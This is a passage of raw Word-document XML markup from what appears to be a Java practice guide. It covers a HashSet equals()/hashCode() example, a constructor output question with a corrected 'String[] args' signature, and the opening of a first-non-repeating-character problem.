      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3FDB36"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h</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3</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC99270"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h</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4</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F03BB36"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h</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5</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D31EF5E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB8C070"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he size will be 1 because all employees are equal based on id and name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB79FB"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S size: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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C435E3D" w14:textId="77777777"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162AFB3" w14:textId="3F3BA0C9" w:rsidR="00E65D2E" w:rsidRPr="00CE4B95"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658A8197" w14:textId="77777777" w:rsidR="00E65D2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00E65D2E" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD757A3" w14:textId="77777777" w:rsidR="00E65D2E" w:rsidRPr="00CE4B95" w:rsidRDefault="00E65D2E" w:rsidP="00DD6565">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685B2011" w14:textId="0D9A7DC3" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD656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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEA0D49" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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shSet&lt;Employee&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We have used a HashSet that will store Employee objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C6C94" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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quals() and hashCode()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: We have overridden both methods so that HashSet can compare Employee objects based on their id and name, not just their memory locations. If two Employee objects have the same id and name, they are considered equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AE596A" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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dding Employees to HashSet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When we add the Employee objects (e1, e2, e3, e4, e5) to the HashSet, only one entry will be stored because all of them are considered equal based on equals() and hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A8DD59" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD656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utput:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5481AD9E" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD656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S size: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEE6D47" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565" w:rsidP="00DD656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y is the size 1?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE2FF55" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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ce all the Employee objects have the same id and name, they are considered equal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A1EBF" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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HashSet does not allow duplicates. So, even though we added five Employee objects to the set, only one unique object (based on equals() and hashCode()) is stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A4813" w14:textId="77777777" w:rsidR="00DD6565" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD6565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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nce, the size of the HashSet is 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD41C8A" w14:textId="79E5D57B" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="374" w:name="_Toc196307854"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00D97588" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the output</w:t>
      </w:r>
      <w:bookmarkEnd w:id="374"/>
    </w:p>
    <w:p w14:paraId="14EEB56E" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>class</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Simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B2EA12" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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7ECA7559" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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Simple</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3804DC1B" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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2D7CCC8E" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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System</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ou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println</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l am in Simple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C027C6" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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11C295A6" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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000088"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>publ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stat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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> main </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string</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args</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F3B60D" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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509C0C21" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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0066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>Simple</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> s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Simple</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0D8A2E20" w14:textId="77777777" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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00FC1526" w14:textId="41072029" w:rsidR="005A003C" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79173465" w14:textId="073CBF7A" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="087573F0" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The code you've provided has a small issue in the main method. The class name String should be capitalized, so it should be String[] args instead of string[] args.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CED6C7F" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Here's the corrected version of your code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68015A" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Corrected Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27391C1F" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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220102"/>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mp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4F89F90" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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2201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mpl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10E2A08" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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2201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I am in Simple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776F631F" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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2201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73AA3E3" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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220102"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FADE63F" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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2201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D66F439" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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2201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mple</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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imple</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B419ED" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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22010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2C57561" w14:textId="555F5727" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420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220102"/>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6CF77C78" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F06A38" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>I am in Simple</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7627DB61" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72180DCC" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constructor Call</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: The main method creates an instance of the Simple class by calling the constructor Simple().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD64B2A" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Constructor Execution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: When the Simple object is created, the constructor Simple() is called, and the message "I am in Simple" is printed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E4E11" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="308"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>: Since there's only one constructor in the Simple class, when you run this program, it prints "I am in Simple".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6749691A" w14:textId="77777777" w:rsidR="00D420C9" w:rsidRPr="00CE4B95" w:rsidRDefault="00D420C9" w:rsidP="00D420C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A41F404" w14:textId="19FEB77E" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="375" w:name="_Toc196307855"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Program – </w:t>
      </w:r>
      <w:r w:rsidR="00FD5670" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>First occurrence of non-repeating character in String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="375"/>
    </w:p>
    <w:p w14:paraId="6AEDC3D5" w14:textId="77777777" w:rsidR="00F52D36" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B" w:rsidP="00F52D36">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00F52D36" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to find the first occurrence of non-repeating character in String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EC2A8" w14:textId="31761024" w:rsidR="00F52D36" w:rsidRPr="00CE4B95" w:rsidRDefault="00F52D36" w:rsidP="00F52D36">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>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t>Input: “aabbcdec”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3AF188" w14:textId="1955F944" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="00F52D36" w:rsidP="00F52D36">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:tab/>
        <w:t>Output: d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350AB19" w14:textId="63D7591B" w:rsidR="005A767B" w:rsidRPr="00CE4B95" w:rsidRDefault="005A767B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
